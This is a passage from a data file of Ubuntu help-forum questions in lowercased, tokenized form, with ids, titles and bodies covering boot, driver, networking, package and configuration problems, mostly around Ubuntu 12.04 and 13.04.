mdraid1x raid devices on disk hd0 . grub-probe : info : the size of hd0 is 3907029168. grub-probe : info : the size of hd0 is 3907029168. grub-probe : info : scanning for mdraid1x raid devices on disk hd0 , msdos1 . grub-probe : info : the size of hd0 is 3907029168. grub-probe : info : found array md/0 ( mdraid1x ) . grub-probe : info : scanning for mdraid1x raid devices on disk hd1 . grub-probe : info : the size of hd1 is 3907029168. grub-probe : info : the size of hd1 is 3907029168. grub-probe : info : scanning for mdraid1x raid devices on disk hd1 , msdos1 . grub-probe : info : the size of hd1 is 3907029168. error : found two disks with the index 1 for raid md/0 . grub-probe : info : scanning for mdraid1x raid devices on disk hd2 . grub-probe : info : the size of hd2 is 3907029168. grub-probe : info : the size of hd2 is 3907029168. grub-probe : info : scanning for mdraid1x raid devices on disk hd2 , msdos1 . grub-probe : info : the size of hd2 is 3907029168. grub-probe : info : scanning for mdraid1x raid devices on disk hd3 . grub-probe : info : the size of hd3 is 250069680. grub-probe : info : the size of hd3 is 250069680. grub-probe : info : scanning for mdraid1x raid devices on disk hd3 , msdos2 . grub-probe : info : the size of hd3 is 250069680. grub-probe : info : scanning for mdraid1x raid devices on disk hd3 , msdos1 . grub-probe : info : the size of hd3 is 250069680. grub-probe : info : scanning md/0 for lvm . grub-probe : info : no lvm signature found . grub-probe : info : scanning hd0 for lvm . grub-probe : info : the size of hd0 is 3907029168. grub-probe : info : no lvm signature found . grub-probe : info : the size of hd0 is 3907029168. grub-probe : info : scanning hd0 , msdos1 for lvm . grub-probe : info : the size of hd0 is 3907029168. grub-probe : info : no lvm signature found . grub-probe : info : scanning hd1 for lvm . grub-probe : info : the size of hd1 is 3907029168. grub-probe : info : no lvm signature found . grub-probe : info : the size of hd1 is 3907029168. grub-probe : info : scanning hd1 , msdos1 for lvm . grub-probe : info : the size of hd1 is 3907029168. grub-probe : info : no lvm signature found . grub-probe : info : scanning hd2 for lvm . grub-probe : info : the size of hd2 is 3907029168. grub-probe : info : no lvm signature found . grub-probe : info : the size of hd2 is 3907029168. grub-probe : info : scanning hd2 , msdos1 for lvm . grub-probe : info : the size of hd2 is 3907029168. grub-probe : info : no lvm signature found . grub-probe : info : scanning hd3 for lvm . grub-probe : info : the size of hd3 is 250069680. grub-probe : info : no lvm signature found . grub-probe : info : the size of hd3 is 250069680. grub-probe : info : scanning hd3 , msdos2 for lvm . grub-probe : info : the size of hd3 is 250069680. grub-probe : info : no lvm signature found . grub-probe : info : scanning hd3 , msdos1 for lvm . grub-probe : info : the size of hd3 is 250069680. grub-probe : info : no lvm signature found . grub-probe : info : /dev/sdd1 starts from 2048. grub-probe : info : opening the device hd3 . grub-probe : info : the size of hd3 is 250069680. grub-probe : info : partition 0 starts from 2048. grub-probe : info : opening hd3 , msdos1 . grub-probe : info : the size of hd3 is 250069680. ext2 /boot/grub/device.map # cat /boot/grub/device.map ( hd0 ) /dev/sda ( hd1 ) /dev/sdb ( hd2 ) /dev/sdc ( hd3 ) /dev/sdd
322906	touchpad does n't work on fujitsu lifebook uh552	recently i bought the laptop with pre-installed win8 and tried to insall ubuntu 13.04 beside it . i have to say , that the installation was fine , but then some strange things began to happen : first booting ubuntu i saw that there like was no desktop enviroment , so the windows did not have title bars , panels did not exis . i installed gnome-fallback . on startup , each time i see psmouse 'raw ' is invalid parameter for 'proto' driver is installed $ sudo apt-get install xserver-xorg-input-synaptics reading package lists ... done building dependency tree reading state information ... done xserver-xorg-input-synaptics is already the newest version . add lines `` grub_cmdline_linux = '' i8042.notimeout i8042.nomux `` in the / etc / default / grub does not work can anybody tell me what to do ?
322908	launching apps that are n't showing up in the app finder ( xubuntu on vm )	i 've been playing around with running different distros of linux in virtualbox on my imac ( os 10.7.3 ) . this is the first time i 've used linux so i basically do n't know what i 'm doing , and am learning as i go ( googling stuff constantly . ) please keep this in mind when answering - i want to learn , but do n't assume i know anything already ! currently i 'm running xubuntu 13.04 in virtualbox , and i wanted to be able to customize the theme a bit more , so i downloaded 'appearance ' and 'unity tweak tool ' from the themes and tweaks tab of the software centre . the problem is , they have n't turned up in the app menu or app finder . the apps are showing up in the 'installed ' tab of the software centre , but you do n't seem to be able to launch them from there , so the only way i can launch them is in terminal . after finally discovering the files in /var/cache/apt/archives , i typed the path /var/cache/apt/archives/ [ filename ] into terminal and hit enter . it said no such file or directory found . did i do something wrong ? is there any other way around this issue of apps not showing in the app menu ?
322911	how do i make sense of the disk usage analyzer ?	i got an alert on my desktop saying that my home directory had only 1.8 gb remaining , which seemed odd to me because i thought i had a lot more than that . i keep my /home directory on a separate partition with roughly 300gb , and i did n't think i had used that much . there was a button to open the disk usage analyzer , and this was what was displayed : two things confuse me . it says i have 286.6 gb total space , of which only 60.8 gb is used , leaving 225.9 gb available . that being the case , why does it say 100 % usage in the list of directories ? storage is on a separate partition , with a symlinked directory in my home folder . why is it being included in the total ? ( it is n't more than 1/3 full in any case ) . if i run disk usage analyzer as root , which was suggested to me as being potentially more informative , i actually get a display that has less information and just as confusing :
322912	install ubuntu alongside windows	when we install ubuntu along with windows 7 do we need any other drivers other than what we have installed on windows ?
322913	installing ubuntu : space allocation	i am trying to install ubuntu into my laptop . will the option 'erase and use the entire disk ' delete all my data in my hard disk ? i donât want to loss my data in the d drive .
322914	stop arbitrarily `` following packages were automatically installed and are no longer required ''	since i 've found similar threads ( 1 , 2 ) but are not helpful to my issues , i 'm opening up a new question . occassionally when i run apt-get , i get : the following packages were automatically installed and are no longer required : : ( list of packages ) this occurs often with the packages that i heavily use . however , because they are not used by the os , the error message itself makes sense if required means os is the one used to require those packages . how can i stop this to happen / let os know that i need these packages ? since there are cases when this notification is actually useful ( eg . packages that os used to require are no longer in need and i do not used them too ) , i prefer solution/workaround that allows case-by-case setting . apt 0.8.16~exp12ubuntu10.11
322916	ubuntu on lenovo yoga 11	i would like to know if it is possible to run ubuntu on my lenovo yoga ideapad 11 ( which is different from the yoga 13 version and the yoga 11s version ) ? also , if it is not possible to replace the windows rt with ubuntu , can i run ubuntu from a usb ? do you know when the tablet version of ubuntu will be available and if it would be possible to run it on my yoga 11 ? windows rt is a horrible os and i want to remove it asap . thank you for your help , joseph
322921	why am i unable to create a swap partition ?	i created the swap partition in gparted after resizing my ubuntu partition . all the operations went off smoothly . when i right-clicked the swap drive , it showed `` swapon '' , so i clicked it & it activated the swap . then i restarted the machine & it showed the swap as swapon again , so i hit it & it failed to activate it giving this error message : then i shut down the machine & restarted . the hdd looks like this now : then i tried to format sda15 to linux-swap & it could not do it giving the error message : just to give a bit of context , i asked a question before on how to repartition my ubuntu hard disk : how can i see where ubuntu has been installed on my hdd ? i repartitioned ( and actually reinstalled ) ubuntu , but now i want to create a swap partition .
322925	getting devices/media to show up in xubuntu on vm	i 'm running xubuntu 13.04 in virtualbox on my imac , and have discovered that devices and optical media do n't show up in the vm at all . for example , usb drives and cds mount on my mac os desktop but not anywhere in xubuntu . i 've done a heap of googling about this problem , but all i found were huge technical discussions which lead nowhere , and did n't help me ( a complete newbie linux user ) at all . i 'd appreciate straightforward instructions , and if they involve using terminal ( which i assume they will ) please be aware i have no prior knowledge of command line stuff and am learning as i go , so i 'll need everything explained to me . thanks in advance ! update : i 've fixed the usb problem - turns out usb 2.0 had to be enabled separately and that 's what my usb drives are . i still ca n't mount cds/dvds though .
322927	unity interface works slow on intel hd 2000	hello ! i 'm install ubuntu 13.04 . all works fine , but unity interface slow and freeze . it 's going me crazy . my pc config : i5-2300 ( http : //ark.intel.com/products/52206/intel-core-i5-2300-processor-6m-cache-up-to-3_10-ghz ? q=2300 ) ; 16gb dd3-1333 ; 128gb ssd ; 1980*1080 ; last month i worked at archlinux with default gnome 3 , and all smooth . ( xf86-video-intel ) i tryed install new intel drivers ( https : //01.org/linuxgraphics/downloads/2013/intel-linux-graphics-installer ) , no effect . any solutions ? sorry for my english .
322931	dualbooting windows 8 and ubuntu 12.04 ?	my question is n't actually about dual-booting them . i have a dual-boot set up and running perfectly . there is only one flaw i was looking for an answer to . since i have n't had any success through others asking this and using their answers i 'd figure i 'd ask myself . both os 's boot perfectly fine there are no errors . i do however have to boot through the bios everytime if i would like to switch os 's . while this is n't necessarily a problem , it is a huge nuisance to have to rapidly press delete everytime i would rather boot into ubuntu than windows . i 'm not necessarily looking for a graphical boot manager . more like the boot manager reefit that is used to assist in selecting which os to boot into on mac osx . i have tried easybcd , and it flat out just does n't work , it 'll boot into windows fine , but it gives me efi errors if i select ubuntu . maybe i 'm just using it wrong i do n't know . if anyone can offer any help please do ! my dual-boot is windows 8 and ubuntu 12.04 lts .
322933	/usr/x11r6 is missing in ubuntu 12.04tls	i have upgraded my ubuntu from 10.10 to 12.04 lts , but the gui is no more working . in cli mode , it is saying that /usr/x11r6 is missing . can you please help me on this ? how can i recover x11r6 ? ? thank you for your prompt response .
322934	installed it wrong and can not uninstall ubuntu	i installed ubuntu alongside windows 8 but dual boot is n't working . it does n't appear in control pannel to simply uninstall . i have 2 hdd and there are 20gb on the second one ( first one is for windows os ) that dont add up so i 'm guessing that is where it 's installed . i installed it from usb so i got to ask does it matter what hdd boots after the usb stick ? because the primary hdd ( with windows ) was set after ubuntu media . and the second hdd had 3rd place . so i dont believe the virtual partition was created on the secondary one . anyway how do i get rid of it in order to reinstall it ?
322940	how to boot into windows xp ?	i am not finding a way to boot into windows xp in my pc . this is the sequence of installation i have done in my pc . ubuntu 13.04 windows xp ( formed dual-boot ) windows 8 installed ( not formatted ubuntu an xp partitions ) centos 6.4 installed thats the way & sequence of installation i have done in my pc . after that i felt windows 8 is crap ( under my needs ) and formatted that drive . i have restored ubuntu grub menu with boot-repair.now i can boot into ubuntu and centos but i cant boot into windows xp . i am getting the windows 8 screen and system restarting automatically when i boot into xp from grub boot loader .
322941	mdic installation	i 've downloaded mdic dictionary from [ 1 ] : http : //mdic.gnufolks.org/ but i do n't know how to install it . the file has named as mdic-0.8.1.tar.gz please guide me to install .
322944	change mouse speed	i would like to change the ratio between the pointer speed and the mouse speed . changing the sensitivity and the acceleration is not what i 'm looking for : sensitivity is something like the threshold of speed above which the pointer starts to accelerate acceleration is the magnitude of this acceleration but what i would like is different : i would like to change the speed of the pointer . i 've looked everywhere but i can not find a solution to my question . i found something about the xorg.conf ( do n't even konw if it will work ) but i can not find my xorg.conf . thank you for your help !
322953	will kubuntu no longer being a funded derivative affect it 's official derivative status ?	it 's a really simple question . i was just wondering since it has far reaching implications for the site , and it is a substantial change to the ecosystem .
322956	pam face authentication terminal install went wrong	i was following the steps from this link http : //lkubuntu.wordpress.com/2011/06/28/pam-face-authentication/ i was trying to set it so i could use my webcam and face recognition to unlock my computer . whenever i open the terminal or power up i get this message : error : ld.so : object '/usr/lib/libv4l/v4l1compat.so ' from /etc/ld.so.preload can not be preloaded : ignored . does anyone know the code lines to undo/remove it ?
322958	top right icons messed up ubuntu 13.04 64bit	first time posting a question here so if i fail , please excuse me and of course notify me about my mistake . my situation is that currently i 'm on holiday in spain and i installed ubuntu 13.04 alongside my windows 8 install . both are 64 bit and my ubuntu also has 32bit libs installed for convenience and running programs like xampp for linux etc . so my issue is not really big or very interesting but it bugs me ... when i first logged in , all the icons in the top right ( e.g . login / wifi / ubuntu one / sound / power ) were all nicely lined up how they are supposed to be . however the second time i logged in ... the power icon was somewhere in-between . i am not an experienced linux user but i do use it for speed and ease of use ( hence ubuntu ) and i know my way a little with the sudoing but nothing special . the only thing i really want is the power button most right . however , i have no clue how to fix this . any help would be much appreciated and sorry for the probably 'stupid ' question .
322960	unity launcher and top panel disappeared after use of boot repair application	i have installed ubuntu alongside win7 . this morning when i turned on pc , noticed that ubuntu was not in list . then i booted pc with ubuntu live dvd and rapaired boot menu with boot rapair application . but after restart of pc my unity launcher and top panel disappeared . now what should i do ?
322965	i can connect to wireless but can not connect to internet	i have a netbook where i use both windows 7 and ubuntu 12.04 lts . one month ago i changed the router , and since that time , using ubuntu , i can connect to wifi but not to internet . anyway , using windows i can connect to wifi and to internet . moreover , using an ethernet cable , i can connect to internet also with ubuntu . someone has ideas ? iwconfig lo no wireless extensions . wlan0 ieee 802.11bgn essid : '' sitecomf6e142 '' mode : managed frequency:2.412 ghz access point : 00:0c : f6 : f6 : e1:42 bit rate=150 mb/s tx-power=14 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : on link quality=59/70 signal level=-51 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:3 invalid misc:167 missed beacon:0 eth0 no wireless extensions . ifconfig eth0 link encap : ethernet indirizzohw c8:0a : a9:0d : bd:70 indirizzo inet:192.168.0.104 bcast:192.168.0.255 maschera:255.255.255.0 indirizzo inet6 : fe80 : :ca0a : a9ff : fe0d : bd70/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:6925 errors:0 dropped:0 overruns:0 frame:0 tx packets:6214 errors:0 dropped:0 overruns:0 carrier:1 collisioni:0 txqueuelen:1000 byte rx:5865027 ( 5.8 mb ) byte tx:975928 ( 975.9 kb ) interrupt:46 lo link encap : loopback locale indirizzo inet:127.0.0.1 maschera:255.0.0.0 indirizzo inet6 : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:808 errors:0 dropped:0 overruns:0 frame:0 tx packets:808 errors:0 dropped:0 overruns:0 carrier:0 collisioni:0 txqueuelen:0 byte rx:70313 ( 70.3 kb ) byte tx:70313 ( 70.3 kb ) wlan0 link encap : ethernet indirizzohw 00:1e:64:36:48:0a indirizzo inet:192.168.0.112 bcast:192.168.0.255 maschera:255.255.255.0 indirizzo inet6 : fe80 : :21e:64ff : fe36:480a/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:625 errors:0 dropped:0 overruns:0 frame:0 tx packets:565 errors:0 dropped:0 overruns:0 carrier:0 collisioni:0 txqueuelen:1000 byte rx:91559 ( 91.5 kb ) byte tx:71963 ( 71.9 kb ) nm-tool networkmanager tool state : connected ( global ) - device : wlan0 [ sitecomf6e142 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : 802.11 wifi driver : iwlwifi state : connected default : no hw address : 00:1e:64:36:48:0a capabilities : speed : 150 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) *sitecomf6e142 : infra , 00:0c : f6 : f6 : e1:42 , freq 2412 mhz , rate 54 mb/s , strength 78 wpa2 ipv4 settings : address : 192.168.0.112 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.0.1 dns : 192.168.0.1 - device : eth0 [ connessione via cavo 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : atl1c state : connected default : yes hw address : c8:0a : a9:0d : bd:70 capabilities : carrier detect : yes speed : 1000 mb/s wired properties carrier : on ipv4 settings : address : 192.168.0.104 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.0.1 dns : 192.168.0.1 lshw -c network *-network description : ethernet interface product : ar8131 gigabit ethernet vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : c0 serial : c8:0a : a9:0d : bd:70 size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi duplex=full firmware=n/a ip=192.168.0.104 latency=0 link=yes multicast=yes port=twisted pair speed=1gbit/s resources : irq:46 memory : d3500000-d353ffff ioport:2000 ( size=128 ) *-network description : wireless interface product : centrino wireless-n 1000 vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 00 serial : 00:1e:64:36:48:0a width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.2.0-49-generic firmware=39.31.5.1 build 35138 ip=192.168.0.112 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:44 memory : d2500000-d2501fff need something else ? thank you .
322968	problem building a qt5 project with qwebkit	i 'm trying to port a simple project from qt4 to qt5 . the project uses qwebkit . i installed the qt5-default and libqt5webkit5-dev packages . i then changed the qmake project file to contain this : qt += webkitwidgets but then when i try to run qmake , i get this output : project error : unknown module ( s ) in qt : quick location sensors i checked , and the libqt5quick5 , libqt5location5 and libqt5sensors5 packages are all installed ( they seems to be dependencies of libqt5webkit ) . what am i missing ? i 'm on ubuntu 13.04 , 64bit .
322971	how to list applications using audio ?	i am trying to fastly check if an application audio is working or not ( because sometimes sound fails to start . it is application bug/limitation i guess ) . what i am doing is to record 1s sample and check if there is something on it . but that is slow here . i wonder if there is some way to list all applications using pulse audio on ubuntu 12.10 ? i believe it has something to do with audio listening ports ; other answers pointed to that but none worked here ; they only listed the pulseaudio pid , but what i need to know is : what applications are using pulseaudio ? , and i need to do this in the command line to use with scripts ! !
322972	can i run my script using inputbox to appear my menu-box before login ?	i am trying to do experiment with /etc/init . i have written a script which displays a window showing some menu . i do n't understand on which event i should start my service . i do n't want any desktop manager after booting so i disabled lightdm . now i want that my script should execute to show my own menu after booting . how can i achieve this ? ? please help ... .. i am using ubuntu 13.04 . this is my script dialog -- backtitle `` linux shell script tutorial `` -- title `` main\ menu '' -- menu `` move using [ up ] [ down ] , [ enter ] to\ select '' 15 60 3 \ date/time `` shows date and time '' \ calendar `` to see calendar `` \ editor `` to start vi editor `` 2 > /tmp/menuitem. $ $ menuitem=`cat /tmp/menuitem. $ $ ` opt= $ ? case $ menuitem in date/time ) date ; ; calendar ) cal ; ; editor ) vi ; ; esac
322975	does ubuntu touch os uses compiz to perform animations	if so , is it possible to have effects like wobbly in ubuntu touch ?
322976	files in home folder get copied to desktop	in my ubuntu 10.04 pc the files that are stored in /home/myusername folder gets copied to desktop automatically . when i delete the files in desktop the files from home directory is also deleted . but i ca n't copy these files to home because it says file exists and whenever i press merge button it shows some error
322978	wrapcallback is not defined in unity webapps	here is what i trying . i am loading a this code in a js file on my site . error seams to be util.js is not getting loaded // ==userscript== // @ require utils.js // ==/userscript== window.unity = external.getunityobject ( 1.0 ) ; function setupmyapp ( ) { var total = 10 ; unity.launcher.setlaunchercount ( total ) ; } unity.init ( { name : `` myapp '' , iconurl : `` http : //localhost:5000/static/icons/icon.png '' , oninit : wrapcallback ( setupmyapp ) } ) ;
322980	how do i install libxfixes.so.3 in ubuntu 13.04 64bit ?	a program reports this error : error libxfixes.so.3 : can not open shared object file how can i resolve this ? thanks !
322982	how to fix spelling mistakes in the man page	while reading the man page of duplicity i found some minor spelling mistakes . what is the easiest way to fix them , or have them fixed . ps : i 'm not a programmer
322984	was my login account hacked on login.ubuntu.com due to the forums security breach ?	i was using my https : //login.ubuntu.com/ account to connect to http : //ubuntuforums.org which has been corrupted . i 've used it also for other services u1 , launchpad , etc . after the recent attack , should i consider all my accounts on these sites to be corrupted ?
322986	how much ram is being used on my laptop ?	i have 3987mb of ram on my laptop . task ( system ) manager says that i am using 700mb of this ram , whilst the command `` free -m '' says i am using nearly 1500mb . which one is correct and why do they show two different values ? thanks for any help .
322989	chromium wont start ?	i reinstalled chromium now it does not start at all . i have ubuntu 11.10 how do i check what is wrong ? why is it so hard to post a question on here ? it keeps saying i have not met the formatting standards .
323000	can i install juju zookeeper on maas server itself ?	is it possible to have juju zookeeper on maas server ? i dont wan na have 2 separate servers for maas and juju .
323003	not able to boot	few days ago i was using windows 8 and it was pretty slow for 4gb ram and struck now and then . revently it became too slow but i did n't install anything so i tried to install windows 7 with the cd . everything went well until every time at last when windows has to boot it just keeps blinking or says press ok to ... . from cd or dvd even if i press ok nothing happens . so i downloaded ubuntu 13.04 i tried ubuntu from live usb i could access files so bravely i installed it after formatting windows drive ( not other drives from the ubuntu desk . ) i gave ext4filesystem and / to mount . i think i made the mistake here instead of giving my 320gb internal i gave sda3 which had my windows , now even ubuntu does n't boot when i use my bootable pen drive it says can not open root device `` null '' or unknown block ( 0,0 ) error -6 please append a correct `` root= '' boot option , ... ... ... kernel panic - not syncing : vfs : unable to mount ... .. i want my data i do n't have any backup and want to install ubuntu is there any possible way or am i too late ? help me . oh my god now when i again tried to install windows 7 it says no drives were found.windows 8 cd struck at logo .
323005	php openssl extension has a package ?	i know that openssl extension is in php source , but i ca n't enable it when i perform apt-get install php5 . there is not even a apt-get install php5-openssl . how i must proceed ?
323011	install latest ubuntu on new hard drive	i have a hp pavillion dv6-6108 that i purchased november 2011 . since then the hard drive has crashed twice . the first crash was because the laptop met the kitchen floor when i tripped over the ac cord . i upgraded to a t byte hard drive purchased at a local depot for office supplies and they charged an additional $ 100 bucks to install windows 7 . i made a backup repair disk ( 14 ) of them and an iso disk . i stated to get many `` x not responding '' messages and it started to run slow . it got to the point where it would n't start up and to get what i can off the hard drive before out fully crashes . i was able to replace the hard drive from the office place under warranty , however , they wanted to charge again to replace the os . i said forget it thu should put it back on for free because the hard drive crashed not because of my error . they would n't so i figured screw them and mi*o s*t i want ubuntu . how do i get it on my laptop with a blank hard drive . thanks for any advice .
323013	how to open files from folders using terminal command	i am beginning to learn and love ubuntu . is there any way to open files like .pdf , .jpeg , .odt , .docx etc . using command line ? for instance , i have a pdf named : 9949107741mathformulas.pdf in the following directory : jitendra @ jitendra : ~/downloads/math.formulas.and.tables.8.retail $ when i go to above directory type 9949107741mathformulas.pdf to open it , i get the message : 9949107741mathformulas.pdf : command not found please advise , how can this task be accomplished ?
323017	sendmail gives empty recipients in email	im using a script that takes backup and sends status email using sendmail but the emails its sending comes with the to tag empty here is an image of it here is the part of the script # email settings message_success= '' backup generated successfully '' message_failure= '' problem occured while generating backup '' subject= '' backup status mail '' sender_name=backup recipients= '' tarun @ gmail.com '' echo `` subject : $ subject\n\n $ message_failure '' | sendmail -f $ sender_name $ recipients echo `` subject : $ subject\n\n $ message_success '' | sendmail -f $ sender_name $ recipients can it be solved so that i can see who has recieved emails . thanks .
323020	why does n't my pc play dvds ?	my pc has the latest version of ubuntu installed ( 13.04 ) and i usually watch movies ( also on dvds ) with vlc player . now that i havent watched a dvd in long time i wanted to try it again . but it did n't worked . vlc player starts and switches from play to pause while the drive makes noise in the same rythm . it looks like it is stuck in an infinite loop . the movie player ( ubuntu builtin player ) gives a warning that says he couldnt play the dvd ( no reason said ) . i tried more than just one dvd , they all did n't work . half a year ago i watched dvds with vlc player and everything worked fine . maybe there 's a problem with third-party-software ? does anyone have the same problem ? could you please help me with that ?
323021	formating kindle book in libreoffice	as anyone created a kindle book with libreoffice ? i 've been doing the following so far : adding 0.40 of indentation on the first line of each paragraph . setting line height to 1.5 justifying the text are there other suggestions ? if i save the book in .doc format does it display ok when turned into kindle format ?
323024	help me to configure redsocks in order to using a https proxy ?	it 's long time i 'm looking a good alternative for proxifier . it 's some months i 'm using proxychains , but still yet i have problem in opening https websites . i found redsocks as another alternative . is it possible help me configuring it for a https proxy with `` username & password '' to bypass internet filtering in my country ?
323028	dual-booting ubuntu-gnome 13.04 and backtrack 5 r3	does anyone have instructions as to how to dual-boot ubuntu-gnome 13.04 and backtrack 5 r3 . i have ubuntu already installed and would like to install backtrack alongside it . i have found guides online for previous releases of both but was n't sure if the set-up would be the same . thank you in advance .
323031	how to install ndis driver for huawei mobile broadband devices ?	my 3g dongal requires the proprietary driver to properly work with ubuntu . it comes along with huawei mobile partner installer . i was able to install huawei mobile partner and the corresponding driver in ubuntu linux 10.04 without an any problem . however , i ca n't install it in ubuntu 13.10 . ( did n't work since 12.04 ) it gives the below error . i 've tried installing build-essential . any help is appreciated ! `` make : * [ install ] error 2 install ndis driver failed . the compiling environment is not all ready . please check gcc , make and kernel build ( /lib/modules/3.8.0-26-generic/build ) to be all installed ? now please enter any key to finish other installations . ndis is disabled , and only modem can be used '' . these packages gcc , make , and others are installed . ( the output is taken from a previous version of ubuntu . the same error message is generated in 13.10 . you can regenerate this error by trying to install my driver package . the mobile broadband is not required for the installation )
323037	problem to install ubuntu using flash drive	i have a problem when i want to install ubuntu using my flash drive . after i choose to install ubuntu along win 7 , my laptop restarts and then i have to choose the boot device ( my flash drive which contains ubuntu ) otherwise it starts win 7 . also when i choose the boot device , it starts the installation process again and from the beginning . model of laptop : dell inspiron 5520 any help ? thanks in advance . edit : i checked the disk management and there are 3 primary partitions and 1 `` oem partition '' .
323042	remove a file just before shutdown/reboot	i added the following content in /etc/init.d/reboot script : file= '' /etc/udev/rules.d/70-persistent-net.rules '' rm $ file this did not work , since it complained when i restarted the system : rm : can not remove `/etc/udev/rules.d/70-persistent-net.rules ' : read-only file system
323046	troubleshooting oracle java 7 with firefox	i run ubuntu 13.04 with up-to-date firefox and oracle java 7 is installed from the package oracle-java7-installer from the ppa : webupd8team/java ppa . java does n't work in firefox . when i start firefox from the command line , and open a webpage with some java , the java applet does n't work and in the terminal firefox prints : $ firefox ( process:28565 ) : glib-critical ** : g_slice_set_config : assertion `sys_page_size == 0 ' failed java.io.ioexception : can not run program `` /usr/lib/jvm/java-7-oracle/jre/bin/java '' : error=13 , permission denied at java.lang.processbuilder.start ( processbuilder.java:1041 ) at sun.plugin2.jvm.jvmlauncher.start ( unknown source ) at sun.plugin2.main.server.jvminstance.startimpl ( unknown source ) ( and some 20-30 lines more ) ( i guess the glib-line can be ignored here . ) also , when i close the tab that contained the java applet , firefox freezes and i have to kill it . however , the permissions look fine : $ ls -l /usr/lib/jvm/java-7-oracle/jre/bin/java -rwxr-xr-x 1 root root 5746 jul 22 17:35 /usr/lib/jvm/java-7-oracle/jre/bin/java so , what could be wrong here ? what to check next ? edit : oracle java is needed for stupid danske bank online banking . ( you are of course welcome to suggest me to change my bank . )
323047	how to compile imageclipper in 12.04	i 've been trying to compile imageclipper unsuccessfully , i 've already installed opencv and boost and build-essential ( gcc version is 4.6.3 ) . the problem comes when modifying the makefile , i need to replace two variables according to my system . originally these variables are like this : cflags = `pkg-config -- cflags opencv` -i ~/usr/include/boost-1_36 -i. lflags = `pkg-config -- libs opencv` -l ~/usr/lib -lboost_system-gcc41-mt -lboost_filesystem-gcc41-mt i installed boost through synaptic ( installed libboost-all-dev ) , how can i find the installation paths to boost and lboost_system-gcc41-mt ? edit : after making a little more of research , my makefile is : cflags = `pkg-config -- cflags opencv` -i /usr/include/boost -i. lflags = `pkg-config -- libs opencv` -l /usr/lib -lboost_system-mt -lboost_filesystem-mt now i got this error : in file included from imageclipper.cpp:43:0 : filesystem.h : in function ‘std : :string fs : :realpath ( const string & ) ’ : filesystem.h:60:23 : error : ‘class boost : :filesystem3 : :path’ has no member named ‘native_file_string’ filesystem.h : in function ‘std : :string fs : :dirname ( const string & ) ’ : filesystem.h:66:37 : error : ‘class boost : :filesystem3 : :path’ has no member named ‘native_file_string’ filesystem.h : in function ‘std : :string fs : :basename ( const string & ) ’ : filesystem.h:72:28 : error : could not convert ‘boost : :filesystem3 : :path : :leaf ( ) const ( ) ’ from ‘boost : :filesystem3 : :path’ to ‘std : :string { aka std : :basic_string < char > } ’ filesystem.h : in function ‘std : :vector < std : :basic_string < char > > fs : :filelist ( const string & , const std : :vector < std : :basic_string < char > > & , std : :string ) ’ : filesystem.h:129:44 : error : ‘class boost : :filesystem3 : :path’ has no member named ‘native_file_string’ filesystem.h:131:50 : error : ‘class boost : :filesystem3 : :path’ has no member named ‘native_file_string’ filesystem.h:133:50 : error : ‘class boost : :filesystem3 : :path’ has no member named ‘native_file_string’ filesystem.h:135:50 : error : ‘class boost : :filesystem3 : :path’ has no member named ‘native_file_string’ filesystem.h:137:50 : error : ‘class boost : :filesystem3 : :path’ has no member named ‘native_file_string’ filesystem.h:139:50 : error : ‘class boost : :filesystem3 : :path’ has no member named ‘native_file_string’
323049	kgpg decrypt files without asking paraphrase	i have my own personal key pair . i encrypted folder in dolphin , using kgpg . ( right click > encrypt ) then message came saying , it will create temp zip file in /tmp and it will delete that , after encrypting . and window came to ask me to choose which key to use to encrypt . i choose my own public key . they it created gpg file . then i opened it by clicking on it . kgpg asked my pass phrase . so , i provided it and , it created decrypted file . so , i copied encrypted file to another folder . and then i opened it again . ( i did that to make sure i can decrypt that file using my pass phrase . that time it did n't ask me for pass phrase . it just decrypted it . so i opended kgpg editor and typed 123 and clicked encrypt button . and then clicked decrypt button . it did n't asked for pass phrase . it decrypted that encrypted message correctly . so , what is going on ? how can i make this stop and set it to ask pass phrase everytime ? i 'm using kubuntu 13.04 .
323051	are there any ubuntu tablets that can be purchased ?	is there a tablet that can be purchased with ubuntu or what tablets are suggested for ubuntu ?
323053	problem with localhost when installing utorrent .	i installed everything correctly but i can not connect to the localhost in the web browser . please help me . thank you .
323054	lenovo z580 does not boot	i have lenovo z580 with windows 8 preloaded . i removed it and installed a fresh copy of ubuntu 13.04 64 bit . when i start my laptop , it sometimes hangs with a black screen and with a cursor . this happens frequently . if i long press my power button and reboot the system , it loads normally .
323056	removal of ubuntu	i have been trying what different people have been told to do in my situation , but i 'm unable to . i have tried to remove the ubuntu partition from a live cd and was unsuccessful . this is how the partitions are set . file : ///home/lonewolf644/pictures/screenshot % 20from % 202013-07-22 % 2017:08:08.png i do n't know if the image loaded up . if it did n't here is a brief explanation : there are 4 partitions , 2 of of which are unallocated and only add up to 49.02 mb . there is then an ext2 and it has /boot as mount point , this has 243 mb . the last partition is in a sub partition , lvm2 pv and mount point is ubuntu-vg , this has the rest of the memory , 465.47 gb . how can i uninstall ubuntu ?
323057	lock terminal size	is there a way for me to lock the terminal screen size so that it can not be changed ? i.e . double clicking the file bar will not maximize the screen , i can not drag the corners to resize it , anything like that until the user specifically unlocks it . i 'll also take any terminal with this feature , not just the default terminal , so long as it can run a python program .
